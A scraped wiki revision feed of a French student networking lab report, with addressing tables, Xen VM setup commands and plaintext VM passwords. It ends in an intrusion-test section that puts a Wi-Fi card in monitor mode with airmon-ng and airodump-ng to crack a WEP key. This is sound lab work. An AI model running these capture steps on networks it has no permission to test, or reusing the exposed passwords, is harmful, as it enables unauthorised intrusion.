| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
* On se connecte en ssh à capbreton :&lt;br /&gt;
{|&lt;br /&gt;
! ssh root@capbreton&lt;br /&gt;
|}&lt;br /&gt;
* On :&lt;br /&gt;
{|&lt;br /&gt;
! export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
|}&lt;br /&gt;
* On: &lt;br /&gt;
{| &lt;br /&gt;
! xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
|}&lt;br /&gt;
* On: &lt;br /&gt;
{|&lt;br /&gt;
!&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Lancement de la capture des paquets :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlx40a5ef012de1&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56190</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56190"/>
				<updated>2021-10-25T14:34:28Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.41/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
* On se connecte en ssh à capbreton :&lt;br /&gt;
{|ssh root@capbreton&lt;br /&gt;
|}&lt;br /&gt;
* On :&lt;br /&gt;
{|export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
|}&lt;br /&gt;
* On: &lt;br /&gt;
{| xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
|}&lt;br /&gt;
* On: &lt;br /&gt;
{|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Lancement de la capture des paquets :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlx40a5ef012de1&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56188</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56188"/>
				<updated>2021-10-25T14:32:13Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.41/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
&amp;gt; su -&lt;br /&gt;
glopglop&lt;br /&gt;
&amp;gt;ssh root@capbreton&lt;br /&gt;
&amp;gt;export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&amp;gt;xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Lancement de la capture des paquets :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlx40a5ef012de1&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56087</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56087"/>
				<updated>2021-10-11T16:39:37Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* Architecture réseau */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
= 2. Plan d'Adressage = &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56086</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56086"/>
				<updated>2021-10-11T16:39:21Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
= 2. Plan d'Adressage = &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
| x&lt;br /&gt;
